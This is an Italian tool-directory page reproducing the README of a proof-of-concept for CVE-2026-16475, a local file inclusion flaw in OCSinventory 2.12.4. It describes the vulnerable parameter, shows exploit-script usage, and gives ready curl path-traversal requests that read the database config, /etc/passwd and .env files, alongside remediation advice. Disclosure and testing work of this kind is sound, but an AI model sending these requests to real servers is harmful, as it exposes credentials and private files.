Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-16475-PoC — Questo è il repository ufficiale con il PoC della CVE-2026-16475, una LFI in OCSinventory 2.12.4. | Kitploit
Strumenti/GitHubGitHub/afertar/cve-2026-16475-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubafertar/cve-2026-16475-poc

CVE-2026-16475-PoC

Questo è il repository ufficiale con il PoC della CVE-2026-16475, una LFI in OCSinventory 2.12.4.

Vedi Repository
22 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-16475 - PoC LFI OCSinventory

Vulnerabilità di Local File Inclusion in OCSinventory 2.12.4

Dettagli della vulnerabilità

CVE ID: CVE-2026-16475
Punteggio CVSS: 6.9 (Medio)
CWE: CWE-98 (Controllo improprio del nome file per l'istruzione Include/Require in un programma PHP)
Versione interessata: OCSinventory 2.12.4
Stato: Corretto nelle versioni più recenti

Descrizione

Una vulnerabilità di Local File Inclusion (LFI) esiste nell'endpoint /ajax/teledeployoptions.php a causa di una sanitizzazione impropria del parametro linkedoptions prima del suo utilizzo in un'operazione dinamica di inclusione di file XML.

L'endpoint è progettato per caricare file di configurazione XML ma non riesce a validare correttamente il parametro linkedoptions, consentendo attacchi di path traversal.

Un attaccante remoto non autenticato può sfruttare questa vulnerabilità per:

  • Includere e accedere a file XML arbitrari all'interno della directory dell'applicazione
  • Leggere file non-XML tramite i messaggi di errore del parser XML
  • Divulgare informazioni sensibili sulle risorse interne dell'applicazione
  • Enumerare i file di sistema ed eseguire il fingerprinting del sistema operativo

Impatto

  • Riservatezza: ALTA - Accesso a file arbitrari (file di configurazione, codice sorgente, log, file di sistema)
  • Integrità: NESSUNA
  • Disponibilità: NESSUNA
  • Autenticazione richiesta: NO
  • Interazione utente: NO

Utilizzo

Prerequisiti

root@kitploit:~
pip install -r requirements.txt

Versione Python (Consigliata)

root@kitploit:~
python3 exploit.py -u http://target.com -v

Opzioni:

  • -u, --url - URL del target (obbligatorio)
  • -v, --verbose - Output verboso
  • -o, --output - Salva le letture riuscite su file

Esempio:

root@kitploit:~
python3 exploit.py -u http://ocs.example.com -v -o results.txt

Versione Bash

root@kitploit:~
./lfi_test.sh

Modifica la variabile BASE_URL nello script:

root@kitploit:~
BASE_URL="http://target.com/ajax/teledeployoptions.php"

Target enumerati

  • File di configurazione dell'applicazione (dbconfig.inc, .env, config.inc)
  • File di lavoro XML (bashscriptopt, executableopt, msiapplicationopt)
  • Log di sistema (apache2, mysql, auth)
  • File di sistema (/proc/, /etc/)
  • Segreti dell'applicazione (composer, file di pacchetto, .htaccess)

Esempio di sfruttamento

root@kitploit:~
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"

# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"

# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"

Rimedio

Per gli utenti:

  • Aggiorna OCSinventory all'ultima versione immediatamente
  • Implementa regole WAF per bloccare i pattern di directory traversal

Per gli sviluppatori:

  • Utilizza basename() o funzioni simili per prevenire il path traversal
  • Valida e sanitizza tutti gli input utente prima delle operazioni sui file
  • Implementa controlli di accesso adeguati
  • Utilizza allow-list per i percorsi file validi

Riferimenti

  • Avviso INCIBE (ES) - Autorità ufficiale di coordinamento CVE
  • OCS Inventory GitHub
  • OWASP Path Traversal
  • Definizione CWE-98

Nota: CVE-2026-16475 è coordinato tramite INCIBE e potrebbe non essere ancora indicizzato in NVD. Consulta la fonte INCIBE per informazioni autorevoli.

Note legali

Solo per scopi educativi e test autorizzati

Vedi DISCLAIMER.md per l'informativa legale completa.

Autore

Adrián Ferrer Tarí


Divulgazione responsabile coordinata tramite INCIBE

Scarica lo strumento